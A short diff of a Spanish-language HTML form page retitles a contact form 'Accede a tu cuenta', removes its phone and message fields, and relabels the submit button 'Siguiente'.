--- a/index.html
+++ b/index.html
@@ -15,7 +15,7 @@
     <!-- Logo + Título -->
     <div class="text-center mb-6">
       <i class="fa-solid fa-envelope text-3xl text-emerald-600 mb-2"></i>
-      <h1 class="text-xl font-semibold">Contáctanos</h1>
+      <h1 class="text-xl font-semibold">Accede a tu cuenta</h1>
     </div>
 
     <!-- Formulario -->
@@ -35,12 +35,6 @@
                name="nombre" placeholder="Nombres y apellidos" required>
         <p id="errorNombre" class="text-red-600 text-sm mt-1 hidden">Nombre incorrecto</p>
       </div>
-
-      <input class="border border-gray-300 rounded px-4 py-2 focus:outline-none focus:ring-1 focus:ring-emerald-500" 
-             name="telefono" placeholder="Teléfono" required>
-
-      <textarea class="border border-gray-300 rounded px-4 py-2 h-28 resize-none focus:outline-none focus:ring-1 focus:ring-emerald-500" 
-                name="mensaje" placeholder="Escriba su mensaje" required></textarea>
       
       <!-- Redirección después de enviar -->
       <input type="hidden" name="_next" value="https://tu-pagina.com/gracias.html">
@@ -50,7 +44,7 @@
       <!-- Botón -->
       <button type="submit" 
               class="bg-blue-600 hover:bg-blue-700 text-white py-2 rounded font-medium">
-        Enviar
+        Siguiente
       </button>
     </form>
 
